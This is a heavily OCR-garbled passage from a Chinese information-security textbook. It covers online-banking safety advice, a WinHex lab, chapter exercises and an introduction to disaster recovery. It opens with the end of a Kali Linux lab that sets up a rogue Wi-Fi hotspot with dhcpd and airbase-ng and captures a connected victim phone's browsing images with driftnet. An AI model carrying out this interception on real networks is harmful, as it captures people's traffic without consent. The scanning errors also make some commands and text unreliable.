[ ok ] Stopping isc- dhcp- server (via systemctl): isc- dhcp- server. service. 

Internet Systems Consortium DHCP Server 4.3.1 

Copyright 2004-2014 Internet Systems Consortium. 

Alt rights reserved. 

For info, please visit https://www. isc. org/ software/ dhcp/ 

Config file: /etc/dhcp/dncpd. conf 

Database file: /var/lib/dhcp/ dhcpd leases 

PID file: /var/ run/ dhcpd pid 

rote 1 leases to leases file. 

Listening on LPF/at0/9c: d2: 1e: aS: e7: 11/192. 168. 1. 0/24 

Sending on LPF/at0/9c: d2: 1e: aS: e7: 11/192. 168. 1. 0/24 

Sending on ^ Socket/fallback/fallback-net 

Server starting service. 


图 7-15 开启 dhcpd 


第 4 步 : 捕获 被 欺骗 者 手机 流量 。 如 果 看 到 图 7-16 中 的 最 后 一 行 ,说 明 被 欺骗 者 手机 
已 经 连接 上 了 Wi-Fi 热点 .并 在 手机 上 使 用 浏览 器 访问 http://www. ebay. cn/。 


root@debian: ~ eoo 


root@debian: - x root()debian: ~ x root@debian: - x 


rootGdebian: ~# airbase-ng -e ztg wlan0 

07:48:22 Created tap interface at0 

07:48:22 Trying to set MTU on at0 to 1500 

07:48:22 Trying to set MTU on wlan0 to 1800 

07:48:22 Access Point with BSSID 9C: D2: 1E: AS: E7: F1 started. 

07:48: 30 Client C8: AA: 21: DF: 0D: 6D associated (unencrypted) to ESSID: " ztg" 


图 7-16 被 欺骗 者 手机 已 经 连接 上 了 Wi-Fi 热点 


在 攻击 者 计算 机 上 ,开启 终端 4, 执 行 driftnet -i ato 命令 ,捕获 到 被 欺骗 者 访问 http:// 
www. ebay. cn/ 网 站 时 页 面 中 所 包含 的 图 片 ,如 图 7-17 所 示 。 
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也 可 以 执行 driftnet -a -i ato 命令 ,直接 保存 捕获 的 图 片 , 如 图 7-18 所 示 。 


root@debian: ~ eoo0 
To... X To... X ro.. X ro... X TO. * | ro... X 


rootGdebian:-4 driftnet -a -i at0 

/tmp/ drifnet- 697x61/driftnet- 55ef82df6b8b4567. gif 
|/ tmp/ drifnet-697x61/driftnet- 55ef826e5327b23c6. jpeg 
V tmp/ drifnet-697x61/driftnet- 55ef82e5643c9869. jpeg 


图 7-18 保存 捕获 的 图 片 


其 他 的 攻击 方法 请 参考 5.6 节 、5.17 节 。 
提示 : 如 果 使 用 笔记 本 (内 置 无 线 网 卡 ) 作 为 攻击 者 ,Wi-Fi 信 号 可 能 不 稳定 。 


76 网 上 银行 账户 安全 


网 上 银行 是 21 世纪 金融 业 的 一 次 革命 ,是 网 络 时 代 的 金融 业 的 创新 ,是 网 络 经 济 时 代 
的 金融 业 转 型 ,是 传统 银行 业务 的 创新 和 发 展 。 

1. 什么 是 网 上 银行 

网 上 银行 借助 于 互联 网 数字 通信 技术 向 客户 提供 金融 信息 发 布 和 金融 交易 服务 ,是 传 
统 银行 业务 在 互联 网 上 的 延伸 ,是 一 种 虚拟 银行 ,没有 传统 精致 的 银行 装修 门面 ,没有 银行 
业务 柜台 和 柜员 ,银行 业务 和 运营 模式 与 传统 银行 有 很 大 区 别 , 在 线 为 客户 提供 办 理 结算 、 
信贷 服务 的 商业 银行 。 

网 上 银行 提供 3A 式 服务 , 即 Anytime( 任 何 时 间 )、Anywhere( 任 何 地 点 )、Anyhow( 任 
何方 式 )。 

网 上 银行 对 个 人 提供 的 业务 包括 个 人 查询 ` 个 人 转账 、 代 理 缴费 ,挂失 服务 .外 汇 买卖 、 
电子 汇款 和 个 人 投资 理财 。 

网 上 银行 对 公 提 供 的 业务 包括 信息 发 布 、 信 贷 、 存 款 、 转 账 和 支付 中 介 、 国 际 业 务 、 住 房 
金融 受托 代理 .基金 托管 .资金 清算 和 保险 箱 。 

2. 网 上 银行 的 发 展 

第 一 个 网 络 银行 于 1995 年 在 美国 诞生 一 一 安全 第 一 银行 (Security First Network 
Bank) 。 继 美国 之 后 8 个 月 ,中 国 银行 于 1996 年 建立 了 自己 的 网 上 银行 ,1998 年 开始 提供 
网 上 银行 服务 ; 1998 4E 3 月 中 国 第 一 笔 网 上 交易 成 功 。 目 前 所 有 的 商业 银行 都 建立 了 不 同 
规模 的 网 上 银行 ,网 上 银行 是 基于 互联 网 的 虚拟 银行 。 

3. 网 上 银行 安全 隐患 和 可 能 出 现 的 问题 

我 国 的 银行 信息 系统 也 是 比较 先进 的 系统 ,银行 信息 系统 的 信息 安全 涉及 方方面面 。 
网 上 银行 可 以 让 银行 充分 利用 互联 网 来 弥补 网 点 设置 的 不 足 , 为 用 户 提供 方便 的 银行 服务 ， 
这 是 银行 发 展 的 重点 之 一 。 但 是 ,由 于 网 上 银行 中 涉及 资金 的 转移 ,也 不 免 引 起 了 一 些 犯 罪 
分 子 利用 网 络 安全 和 信息 安全 漏洞 来 盗窃 银行 账号 和 密码 来 从 事 犯罪 活动 。 为 了 防范 此 类 
犯罪 ,仅仅 提醒 用 户 注 意 保护 好 密码 是 不 够 的 ,因为 现在 的 技术 手段 完全 可 以 不 在 用 户 使 用 
的 计算 机 旁边 就 可 以 窍 获 用 户 的 账号 和 密码 。 
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中 国人 民 银 行 颁布 的 (网 上 银行 业务 管理 暂行 办 法 ) 规 定 :“ 银 行 应 采用 合适 的 加 密 技 
术 和 措施 ,以 确认 网 上 银行 业务 用 户 身 份 和 授权 .保证 网 上 交易 数据 传输 的 保密 性 、 真 实 性 ， 
保证 通过 网 络 传输 信息 的 完整 性 和 交易 的 不 可 否认 性 ." 由 上 述 可 以 看 出 网 上 银行 信息 安全 
问题 的 严重 性 ,特别 是 近期 不 断 出 现 的 假冒 银行 网 站 和 假冒 银行 的 安全 通知 电子 邮件 的 问 
题 ,使 得 网 上 银行 信息 安全 问题 非常 突出 ,主要 总 结 如 下 。 

CD 机 密 性 问题 。 银 行 用 户 在 使 用 网 上 银行 系统 时 要 求 用 户 输入 用 户 账号 和 密码 等 机 
密 信息 后 ,客户 端 计 算 机 就 把 此 机 密 数 据 通过 互联 网 传 到 网 上 银行 的 服务 器 ,这 个 传输 过 程 
中 要 经 过 的 许多 网 络 设备 和 传输 链 路 (特别 是 有 些 不 安全 的 宽带 接 人 方式 使 得 整个 办 公 
或 居民 小 区 的 所 有 用 户 实 际 上 是 在 一 个 共享 的 局 域 网 上 ) ,如果 此 类 机 密 信 息 不 加 密 传输 ， 
则 非常 容易 和 极 有 可 能 在 传输 过 程 中 被 非法 截取 而 获得 用 户 网 上 银行 的 登录 账号 和 密码 ， 
这 就 可 以 解释 为 何 用 户 没有 “泄露 ?密码 ,但 银行 账户 上 的 钱 还 是 不 愤 而 飞 了 。 

(2) 完整 性 问题 。 如 果 在 用 户 端 计算 机 到 网 上 银行 服务 器 之 间 的 转账 信息 传输 不 加 
密 , 则 非常 容易 和 极 有 可 能 在 传输 过 程 中 被 非法 恶意 自 改 ,把 转账 给 甲 的 银行 账号 算 改 为 转 
账 给 乙 的 银行 账号 ,而 用 户 还 不 知晓 ,因为 用 户 提交 时 是 填写 正确 的 。 

(3) 真实 身份 认证 问题 。 涉 及 两 个 真实 身份 的 认证 问题 ,一 个 是 网 上 银行 用 户 的 真实 
身份 ; 另 一 个 是 网 上 银行 网 站 的 真实 身份 。 非 法 用 户 可 以 伪造 假冒 网 上 银行 网 站 和 银行 
用 户 的 身份 ,因此 用 户 无 法 知道 他 们 所 登录 的 网 站 是 否 是 可 信 的 真实 的 网 上 银行 网 站 ,而 银 
行 也 无 法 验证 登录 到 网 上 银行 的 用 户 是 否 是 合法 身份 , 仅 赁 "用户 名 十 口令 ?的 传统 身份 认 
证 方式 根本 就 没有 任何 安全 性 。 而 有 些 银 行 声称 “对 由 于 用 户 泄露 口令 而 导致 损失 不 负责 
任 ” 的 说 法 是 不 负责 任 的 做 法 ,建议 用 户 不 要 使 用 有 此 类 声明 的 网 上 银行 。 银 行 应 该 采取 切 
实 可 行 的 技术 手段 来 保证 即使 用 户口 令 被 泄露 (更 何况 犯罪 分 子 可 以 有 许多 途径 得 到 用 户 
的 口令 ,而 不 是 用 户 的 过 错 ) ,非法 用 户 也 无 法 通过 真实 身份 认证 ,同时 也 要 采取 技术 措施 让 
用 户 非常 容易 识别 是 真正 的 网 上 银行 网 站 还 是 假冒 的 网 上 银行 网 站 ,仅仅 提醒 用 户 记 住 复 
杂 的 英文 域名 和 网 址 是 不 够 的 ,因为 假冒 银行 网 站 的 域名 往往 与 真实 银行 网 站 只 差 一 个 
字母 。 

(4) 交易 的 不 可 和 否认 性 问题 。 银 行 用 户 有 可 能 会 否认 其 在 线 转账 交易 行为 ,这 里 有 许 
多 原因 ,可 能 是 用 户 本 身 的 原因 ,也 可 能 是 银行 的 原因 ,每 笔 交 易 一 定 要 有 可 靠 的 签名 记录 
用 于 纠纷 仲裁 的 法 律 依据 。 

4. 网 上 银行 出 现 的 安全 问题 

网 上 银行 越 来 越 深入 人 们 的 日 常生 活 ., 通 过 网 上 银行 ,可 以 迅速 办 理 查询 、 汇 款 、 转 账 、 
外 汇 交 易 .基金 买卖 等 各 种 金融 业务 。 但 网 上 银行 的 安全 问题 也 是 人 们 所 关心 的 ,目前 各 银 
行 的 网 上 银行 都 具备 符合 标准 的 安全 系统 及 措施 ,确保 客户 权益 能 得 到 充分 保障 。 如 交通 
银行 的 网 上 银行 就 采取 了 许多 安全 防范 措施 ,其 中 包括 附加 码 校 验 , 以 防止 程序 测试 密码 攻 
击 。 网 上 银行 的 防范 措施 是 很 严密 的 。 虽 然 目 前 各 商业 银行 都 有 意识 地 提高 了 网 上 银行 的 
安全 系数 ,但 是 保护 网 银 账户 的 安全 ,并 不 仅仅 是 银行 的 工作 ,客户 也 应 采取 措施 规避 各 类 
风险 。 比 如 网 上 钓鱼 是 目前 国内 外 不 法 分 子 常 用 的 欺骗 手段 ,利用 人 们 视觉 的 马虎 ,制造 假 
网 址 ,例如 ,将 www. bank-of-china. com. cn 改写 为 www. bank-off-china. com. cn 等 。 

5. 网 上 银行 的 安全 防范 

开展 网 上 银行 有 两 大 保障 : 一 是 技术 保障 ; 二 是 法 律 与 规范 。 
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技术 保障 有 网 络 层 安 全 防范 和 PKI 技术 。 网 络 层 安全 防范 措施 有 设置 过 滤 功 能 的 安 
全 路 由 器 .设置 IDS、 设 置 防 黑客 软件 系统 等 ,网 上 银行 安全 防范 在 网 络 层 实施 安全 机 制 是 
安全 防范 的 重点 之 一 。PKI 是 网 上 银行 目前 最 佳 的 防范 措施 。 

国家 在 2005 年 4 月 1 日 颁布 并 执行 了 中 国 “ 电 子 签名 法 ”, 人 民 银 行 发布 了 “电子 支付 
指引 ”。 这 是 网 上 银行 的 法 律 依据 。 

6. 招商 银行 网 上 个 人 银行 安全 指引 

在 使 用 网 上 银行 时 ,必须 注意 自身 的 安全 防范 ,下 面 通过 引用 “招商 银行 网 上 个 人 银行 
安全 指引 ”中 的 主要 内 容 介 绍 使 用 网 上 银行 时 要 注意 的 事项 。 

网 址 是 http://www. cmbchina. com/personal- business/netbank/common/safe. htm, 

(1) 网 上 个 人 银行 大 众 版 和 专业 版 

在 进行 便利 的 网 上 交易 服务 时 ,新 的 网 络 交易 风险 随 之 产生 。 招 商 银行 为 客户 提供 的 
网 上 银行 服务 分 为 网 上 个 人 银行 大 众 版 和 专业 版 。 

CD 网 上 个 人 银行 大 众 版 。 网 上 个 人 银行 大 众 版 是 招商 银行 基于 互联 网 平台 开发 的 . 通 
过 互联 网 为 广大 客户 提供 全 天 候 银行 金融 服务 的 自助 理财 系统 。 只 要 客户 拥有 招商 银行 账 
户 和 密码 即 可 登录 大 众 版 进行 查询 账户 交易 ,转账 汇款 、 支 付 卡 转账 ,修改 密码 等 操作 。 

网 上 个 人 银行 大 众 版 为 “卡号 十 密码 ”登录 方式 ,卡号 、 密 码 的 保管 非常 重要 ,如 果 卡 号 
和 密码 不 慎 被 他 人 取得 ,他 人 即 可 通过 网 上 银行 大 众 版 通过 转账 ,网 上 支付 卡 转账 等 方式 窍 
取 客 户 账户 资金 。 因 此 ,对 于 使 用 大 众 版 进行 交易 的 客户 ,请 妥善 保管 好 卡号 和 密码 ,防止 
账户 失窃 。 

© 网 上 个 人 银行 专业 版 。 网 上 个 人 银行 专业 版 是 招商 银行 基于 互联 网 平台 开发 的 网 
上 个 人 银行 理财 软件 ,采取 严密 的 X. 509 标准 数字 证 书 体系 ,通过 国家 安全 认证 。 运 用 数 
字 签 名 技术 和 基于 证 书 的 强加 密 通 信 管道 ,确保 客户 身份 认证 和 数据 传输 以 及 密码 输入 的 
安全 。 该 软件 建立 在 严格 的 客户 身份 认证 基础 上 ,对 参与 交易 的 客户 发 放 证 书 ,交易 时 验证 
证 书 。 

网 上 个 人 银行 专业 版 建立 在 “数字 证 书 ” 的 存储 、 使 用 基础 上 ,专业 版 为 “数字 证 书 十 密 
码 ” 的 登录 方式 ; 数字 证 书 分 为 文件 数字 证 书 和 移动 数字 证 书 两 种 ,文件 数字 证 书 可 保存 在 
计算 机 、 移 动 介 质 中 ,并 可 进行 复制 ,安全 性 较 大 众 版 大 幅 提升 ; 移动 数字 证 书 是 一 个 带 智 
能 芯片 .形状 类 似 于 U 盘 的 硬件 设备 ,并 应 用 了 智能 芯片 信息 加 密 技术 的 一 种 数字 签名 工 
H; 不 可 查看 、 复 制 ,具有 唯一 性 ,客户 进行 登录 交易 需 同 时 持 有 移动 数字 证 书 和 客户 密码 
方 可 登录 专业 版 ,任何 人 都 无 法 利用 你 的 身份 信息 和 账户 信息 通过 互联 网 盗 取 你 的 资金 。 
“移动 数字 证 书 ” 是 最 安全 的 交易 方式 。 

(2) 网 上 支付 功能 

网 上 支付 功能 是 招商 银行 提供 的 网 上 支付 平台 ,满足 客户 日 常 网 上 消费 需要 。 招 商 银 
行 网 上 支付 分 为 大 众 版 网 上 支付 和 专业 版 网 上 支付 两 种 形式 。 

大 众 版 网 上 支付 通过 “卡号 十 支付 密码 ”方式 支付 ,目前 提供 支付 卡 、 一 卡通 和 信用 卡 的 
网 上 支付 。 由 于 该 方式 仍 存在 一 定 的 风险 ,银行 为 客户 自动 设置 了 单 笔 和 每 日 支付 限额 。 
其 中 支付 卡 和 一 卡通 每 日 最 高 支付 额度 为 5000 元 人 民 币 .信用卡 每 日 最 高 支付 额度 为 可 用 
额度 ; 客户 可 根据 消费 习惯 通过 “一 网 通 ” 大 众 版 更 改 消 费 限额 以 降低 交易 风险 。 支 付 密 
码 ,请 不 要 和 一 卡通 的 取款 密码 相同 。 

291 


专业 版 网 上 支付 通过 “数字 证 书 十 取款 密码 ”的 方式 支付 ,该 支付 方式 安全 性 高 ,银行 未 
给 客户 设置 单 笔 和 每 日 支付 限额 ,建议 客户 通过 专业 版 根据 消费 习惯 自行 设置 支付 限额 以 
降低 风险 ; 同时 ,对 于 大 额 的 网 上 消费 ,建议 客户 使 用 专业 版 进行 支付 。 

(3) 登录 正确 的 网 址 

招商 银行 网 上 银行 品牌 为 “一 网 通 ”。 

招商 银行 全 国 网 上 银行 网 址 为 http://www. cmbchina. com。 建 议 客户 将 该 网 址 添加 
至 收藏 夹 ,并 直接 通过 访问 ,不 建议 客户 通过 其 他 网 站 链接 进行 访问 ,防止 不 法 分 子 将 网 址 
链接 到 其 他 非法 网 站 窃取 资料 。 

在 进行 网 上 支付 交易 时 ,在 输入 卡号 密码 的 页 面 上 ,请 确认 浏览 器 地 址 栏 里 的 地 址 ,前 
面部 分 必须 是 http://www. cmbchina. com。 

此 外 ,如 果 访 问 * . embchina. com 类 网 址 ,如 果 * 为 wma, mobile, info, WIZ% R Ht A 
招商 银行 系列 合法 网 址 。 

(4) 认 清 网 页 特征 

招商 银行 网 上 银行 网 页 下 方 有 “网 安 ” 图 标 , 如 图 7-19 所 示 ,如 果 单 击 该 图 标 ,图 标 中 的 
备案 编号 为 4403101210120。 


XAHO SAO GO 历史 (5) HEW 工具 QD 帮助 (HH) 
€) 一 网 再 主页 一 MRTE... 
CIIM gii-clamrecec | *à & &5-«48-0-m»» 


服务 热线 : 95555 招商 根 行 奉 户 投诉 受理 林道: 
填 外 服务 热线 ;86-755-84391000 私人 妨 行 服务 埋 线 : 40086-95555 HERO: sssr FA: 9555 


信用 卡 服务 热线 ;400-820-5555 外 石生 宾 服 务 埋 线 ;40088-95555 pem P AORE 
fbr: 4006095s5sH095555-9 — SSHLNURNE HI: 10083-95555 IRSIBG ARAH IHRER 
BERN: 518040 


招商 根 行 一 同 通 GRIT—UvC 
© 2014 招商 根 行 版 权 所 有 
JIC 许可 证 号 882-20040497 


图 7-19 “网 安 ” 图 标 


(5) 保管 好 账号 和 密码 

银行 账号 和 密码 是 保障 客户 银行 资金 安全 的 最 重要 因素 ,对 账号 和 密码 的 保管 非常 重 
要 。 一 旦 客户 的 账号 和 密码 被 他 人 盗 取 , 客 户 的 银行 资金 就 有 可 能 被 盗用 。 为 了 保障 客户 
的 银行 资金 安全 ,请 客户 务必 重视 账号 .密码 的 保管 工作 。 

CD 在 任何 情况 下 ,坚持 账号 和 密码 自己 保管 .不 透露 给 任何 人 的 原则 。 不 要 相信 任何 
通过 电子 邮件 短信、 电话 等 方式 索要 账号 和 密码 的 行为 。 若 有 任何 怀疑 ,请 立即 致电 
95555 与 招商 银行 联系 。 对 于 已 经 向 不 明 人 员 或 网 站 提供 网 上 银行 密码 的 ,要 立即 登录 网 
上 银行 修改 密码 ,或 到 柜 面 进行 密码 重 置 或 通过 电话 及 登录 网 上 银行 申请 挂失 。 

C) 尽量 做 到 密码 不 容易 被 不 法 分 子 破解 。 不 采用 生日 数字 、 电 话 号 码 、 身 份 证 号 码 中 
的 连续 几 位 、 银 行 卡号 中 的 几 位 、 同 一 数字 ,简单 数字 规则 构成 的 密码 。 避 免 密 码 被 不 法 分 
子 破解 , 盗 取 账 户 资金 。 

© 使 用 单独 的 银行 密码 。 将 平时 在 其 他 网 站 使 用 的 各 类 密码 与 银行 密码 区 分 开 ,不 采 
用 同一 密码 ,避免 因 在 其 他 网 站 泄露 密码 导致 银行 密码 同时 失窃 。 

使 用 不 同 的 银行 查询 密码 .取款 密码 和 网 上 支付 密码 。 不 同 的 多 重 密码 能 更 有 效 的 保 
障 客户 账户 资金 的 安全 。 

292 


第 7 章 应 用 安全 技术 

请 不 要 在 招商 银行 网 上 银行 系统 以 外 的 其 他 地 方 输入 卡号 和 密码 。 不 定期 地 修改 自己 
的 密码 。 

(6) 保证 计算 机 安全 

计算 机 及 软件 有 可 能 受到 病毒 及 计算 机 黑客 的 威胁 ,请 留意 以 下 几 点 。 

CD 设置 由 数字 、 字 母 ( 大 ,小 写 ) 构 成 的 不 易 被 破译 的 开机 密码 。 

O 定期 下 载 安 装 最 新 的 操作 系统 和 浏览 器 安全 程序 或 补丁 。 

© 建议 将 计算 机 中 的 hosts 文件 修改 为 只 读 。 

@ 安装 个 人 防火 墙 。 可 以 防止 黑客 人 侵 计算 机 。 

C» 安装 并 及 时 更 新 杀毒 软件 。 养 成 定期 更 新 杀毒 软件 的 习惯 ,防止 新 型 病毒 人 侵 。 

© 使 用 网 上 银行 的 计算 机 不 作为 资料 ,文件 共享 等 类 型 的 服务 器 。 

@ 不 要 开启 来 历 不 明 的 电子 邮件 。 

(7) 增强 安全 意识 

随 着 科技 的 发 展 , 金 融 网 络 犯罪 手法 越 来 越 多 ,但 所 有 的 金融 网 络 犯罪 根源 为 盗 取 客 户 
的 账号 和 密码 。 尽 管 银行 在 安全 方面 采取 了 各 种 措施 ,保障 了 银行 交易 系统 的 安全 ,但 客户 
的 账号 和 密码 的 保管 也 有 赖 于 客户 自己 的 安全 风险 意识 和 行为 。 

(D 不 要 在 公共 场所 使 用 网 上 银行 ,防止 他 人 偷 看 你 的 密码 。 

© 不 要 在 网 吧 、 图 书馆 等 公用 网 络 上 使 用 网 上 银行 ,防止 他 人 安装 监测 程序 或 木马 程 
序 窃取 账号 和 密码 。 

@ 每 次 使 用 网 上 银行 后 ,及 时 退出 。 

@ 在 其 他 渠道 (如 ATM 取款 、 自 助 终端 登录 ) 进 行 交易 时 ,注意 密码 输入 的 保护 措施 ， 
防止 他 人 通过 录像 等 方式 窃取 到 你 的 账号 和 密码 。 

© 切 勿 向 他 人 透露 你 的 用 户 名 、 密 码 或 任何 个 人 身份 识别 资料 。 

© 如 果 客 户 自己 的 个 人 资料 有 任何 更 改 ( 例 如 ,联系 方式 、 地 址 等 有 变动 ), 请 及 时 通过 
银行 系统 修改 相关 资料 。 

CO 定期 查看 自己 的 交易 ,核对 账单 。 

® 遇 到 任何 怀疑 或 问题 ,请 及 时 联系 招商 银行 全 国 统一 客服 电话 


955 


e 
a 
a 


77 实例 : 使 用 WinHex 


WinHex 软件 含 十 六 进 制 编辑 器 \ 磁 盘 编 辑 器 和 RAM 编辑 器 ,可 帮助 我 们 实现 计算 机 
调查 取证 .文件 及 磁盘 数据 恢复 、 磁 盘 的 底层 数据 处 理 , 以 及 密码 分 析 、 软 件 注册 等 信息 安全 
工作 。 它 能 检查 并 且 编 辑 各 种 文件 ,从 磁盘 驱动 器 中 恢复 已 删 文件 或 丢失 的 数据 ,支持 
USBDisk 和 数码 相机 的 存储 卡 。 

WinHex 的 主要 功能 如 下 。 

(1) 磁盘 编辑 器 ,可 分 析 硬 盘 、 软 盘 、.CD-ROM、 U 盘 、 存 储 卡 , 等 等 。 

(2) 支持 FAT、NTFS、Ext213、ReiserFS、Reiser4、LTFS、CDFS、UDF 等 文件 系统 。 

(3) 支持 RAID 系统 和 动态 磁盘 组 。 

OD 支持 多 种 数据 恢复 技术 。 
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(5) 有 RAM 编辑 器 .提供 编辑 物理 RAM 和 其 他 进程 的 虚拟 内 存 的 方法 。 

(6) 灵活 的 查找 及 替换 功能 ,可 实现 文本 .十 六 进 制 数据 等 形式 的 查找 。 

(7) 磁盘 克隆 ( 需 在 DOS 方式 下 实现 ) 。 

(8) 安全 性 由 256 位 的 AES 加 密 、 检 验 和 、CRC32、 哈 希 算 法 CMDS 和 SHA-1 等 方法 
提供 支持 。 

(9) 安全 擦 除 个 人 秘密 文件 功能 ,可 实现 全 盘 数 据 清 理 。 

与 WinHex 相关 的 还 有 该 公司 的 产品 X-Ways Forensics, 该 软件 包含 WinHex 的 所 有 
功能 , 且 具 有 更 强大 的 数据 分 析 、 取 证 能 力 , 感 兴趣 的 读者 可 自己 练习 。 

在 http://www. x-ways. net/winhex. zip 中 下 载 WinHex。 

本 实验 在 虚拟 机 (VMware、Windows 2003 Ce 
SP2) 中 安装 并 使 用 WinHex 15.6, 


实验 过 程 如 下 FZ Wite protection by defaut 
uy À PI 
第 1 步 : dE C HEAR Hoe rp HE X-ways 文件 ^ Reduced user interface 


3€ E X-ways 文件 夹 中 建立 一 个 文本 文件 ,文件 名 
为 winhex. txt, 内 容 为 “使 用 WinHex 练习 ”。 

第 2 步 : 解压 软件 包 WinHex 15. 6. zip, 运 行 图 7-20 选中 Computer forensics interface 
WinHex. exe 文件 ,一定 要 选中 Computer forensics 
interface( 见 图 7-20) ,否则 部 分 功能 不 能 使 用 。 单 击 OK 按钮 ,进入 WinHex 主 界面 ,如 
图 7-21 所 示 。 


Eile Edit Search Position View | Tools Specialist (Op 


DEUST ous G] l> dEr | 898GA 


File Tools 
File Egit R Open BA... nm 
C Nie Shi fte Directory Browser... CtrlfS 
External Prograns » Vierer Progrens... Shiftt75 
Bl Calculator ALEA O Data Interpreter...  ALUFS 
Hex Converter... LI Yodo... 
= Security... 
Ctr1+F2 [ Mätik.. L3 
"| Genecter Set 7 


Start Center... Enter 


Æ 7-21 WinHex 主 界面 


请 大 家 注意 ,这 里 除 WinHex 软件 的 所 有 功能 以 外 ,还 包含 Case Data 区 域 , 用 来 进行 
磁盘 数据 分 析 和 文件 恢复 。 


EE xj 


本 实验 中 主要 使 用 WinHex 的 基本 工具 (Tools)、 
选项 设置 COptions) 、 查 找 功能 (Search) 和 数据 分 析 功 能 
(Case Data), 

第 3 Gp. 在 图 7-21 中 依次 选择 Options > Edit 
Mode. ili IE Select Mode 对 话 框 ,如 图 7-22 所 示 , 选 择 
Default Edit Mode (一 editable) , 单 击 OK 按钮 。 

图 7-22 Select Mode 对 话 框 第 4 步 : 在 图 7-21 中 依次 选择 File-~Open, 打开 文 
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件 winhex. txt, 如 图 7-23 所 示 ,修改 3 一 8 范围 的 六 个 字 节 , 单 击 保存 文件 的 按钮 ,出 现 如 
图 7-24 所 示 对 话 框 , 单 击 Yes 按钮 确认 保存 。 用 记事 本 打开 winhex. txt 文件 ,内 容 为 “ 练 
习 WinHex 练习 ”。 

第 5 步 : 加 密 文 件 winhex. txt。 在 图 7-21 中 依次 选择 Edit Modify Data. 出现 
Modify Data 对 话 框 ,如 图 7-25 所 示 ,选择 XOR ,输入 22, 单 击 OK 按钮 ,对 文件 内 容 进行 加 
密 的 变换 。 加 密 前 文件 内 容 是 “练习 WinHex 练习 ”, Jill 25 Ji XE VJ A Jk "ML DER 2E fn 
KLJGZ 盘 汪 涛 ”"。 解 密 时 进行 同样 的 操作 即 可 。 

WinHex 的 其 他 功能 请 读者 自己 体会 。 


fru. dit Seed Position View Tecls Specialist Options Yindor Help laix 
DEUSTE DAAR ARUXEXM Det l Iom &«»nmg' e 
o | i | 
Offset | 0 1 2 3 8 9 A BC DEF unregister 
00000000 EF mage uE 69 6E 68 65 78 E7 i»ċäkcçi Winhexc  winhexte 
p 5$ WinHex c Kd 


a >] 


8 9A BC D F 
5 OMS UE 6E 68 65 ur 本 aaa 
NU 7.7 WinHex 


图 7-23 ”修改 字 节 


Modify Data x 


CAM [o  —— (FT bexadec] 


C 16bit byte swap C Invert bits 
C 32bit byte swap « ROR [22 
C Left shift by 1 bit cog [w 


E è 


2 ) Are ien redisse cd to SLM 
mm AN" [E] m | one 


图 7-24 确认 保存 文件 图 7-25 Modify Data 对 话 框 


C Bight shit by 1 bà C AND [T 
C Shaby[T — bytes) C ROTI3 
C. Circular left rotation 


78 本 章 小 结 


本 章 介 绍 了 Web 应 用 安全 、XSS 跨 站 攻击 技术 .电子 邮件 加 密 技 术 、 防 垃圾 邮件 技术 、 
网 上 银行 账户 安全 常识 .Kali Linux 中 创建 钓鱼 Wi-Fi 热点 以 及 WinHex 的 一 般 使 用 方法 。 
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通过 对 本 章 的 学 习 , 读 者 对 网 络 应 用 中 存在 的 一 些 威胁 有 一 个 清楚 的 认识 ,进而 提高 读者 安 
全 使 用 网 络 的 水 平和 技能 。 


1. 填空 题 

(1) Web 是 的 简称 , 即 万 维 网 。Web 服务 是 指 采 用 架构 ,通过 
HTTP 协议 提供 服务 的 统称 ,这 种 结构 也 称 为 架构 。 

(2) 是 一 种 用 来 制作 网 页 的 标记 语言 , 它 不 需要 编译 ,可 以 直接 由 浏览 器 执 
行 , 属 于 浏览 器 解释 型 语言 。 

(3) JavaScript 是 一 种 的 描述 语言 ,可 以 用 来 开发 Internet. 客户 端的 应 用 
程序 。 

(4) 实时 监控 Web 站 点 , 当 Web 站 点 上 的 文件 受到 破坏 时 ,能 迅速 恢复 被 破 
坏 的 文件 ,并 及 时 提交 报告 给 系统 管理 员 , 从 而 保护 Web 站 点 的 数据 安全 。 

(5) 是 可 以 管理 Web ,修改 主页 内 容 等 的 权限 ,如 果 要 修改 别人 的 主页 ,一般 
都 需要 这 个 权限 ,上 传 漏洞 要 得 到 的 也 是 这 个 权限 。 

(6) 借助 于 互联 网 数字 通信 技术 向 客户 提供 金融 信息 发 布 和 金融 交易 服务 ， 
是 传统 银行 业务 在 互联 网 上 的 延伸 ,是 一 种 虚拟 银行 。 

CD 开展 网 上 银行 有 两 大 保障 : 和 

2. 思考 与 简 答 题 

(1) 简 述 Web 技术 简介 与 安全 分 析 。 

(2) 简 述 网 上 银行 账户 安全 问题 。 

3. 上 机 题 

(1) 在 Kali Linux 中 创建 Wi-Fi 热点 。 

(2) 练习 使 用 WinHex。 
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本 章 学 习 目 标 

。 了 人 解 容 灾 技术 的 基本 概念 。 

。 了 解 RAID 级 别 及 其 特点 。 

。 了 解 并 会 使 用 一 些 常 用 数据 恢复 工具 。 
。 了解 数据 备份 技术 的 基本 概念 。 

。 掌握 Ghost 的 使 用 。 


容 灾 与 数据 备份 技术 在 信息 安全 领域 有 着 举足轻重 的 地 位 ,本 章 对 容 灾 技术 和 数据 备 
份 技术 的 基本 概念 进行 介绍 。 


81 容 灾 技术 


忽视 数据 备份 ,没有 容 灾 能 力 ,将 会 给 企业 或 组 织带 来 巨大 的 损失 , 据 统计 资料 显示 , 当 
受到 数据 灾难 袭击 时 ,30% 受 影响 的 公司 被 迫 立即 退出 市 场 ,另外 有 29% 受 影响 的 公司 会 
在 两 年 内 倒闭 。 所 以 当 各 种 无 法 预知 的 事故 或 灾难 导致 重要 的 数据 丢失 时 ,能 够 及 时 采取 
灾难 恢复 措施 ,可 以 将 企业 或 组 织 的 损失 降低 到 最 低 。 


8.1.1. 容 灾 技 术 概 述 


据 统计 资料 显示 ,2000 年 以 前 的 10 年 间 发 生 过 灾难 的 公司 中 ,有 55% 当 时 倒闭 ; 剩 下 
的 45%% 中 ,因为 数据 丢失 ,有 29% 也 在 两 年 之 内 倒闭 ,生存 下 来 的 仅 占 16%。 在 1993 年 发 
生 的 美国 世贸 中 心 大 楼 爆炸 事件 ,爆炸 前 , 约 有 350 家 企业 在 该 楼 中 工作 ,一 年 后 ,再 回 到 世 
贸 大 楼 的 公司 变 成 了 150 家 ,有 200 家 企业 由 于 无 法 存 取 原 有 重要 的 信息 而 倒闭 。 
2003 年 ,国内 某 电 信和 运营 商 的 计 费 存储 系统 发 生 两 个 小 时 的 故障 ,造成 400 多 万 元 的 损失 ， 
这 些 还 不 包括 导致 的 无 形 资产 损失 。 另 外 ,大 家 熟悉 的 “9. 11" 事 件 带 来 的 损失 更 是 巨大 ,还 
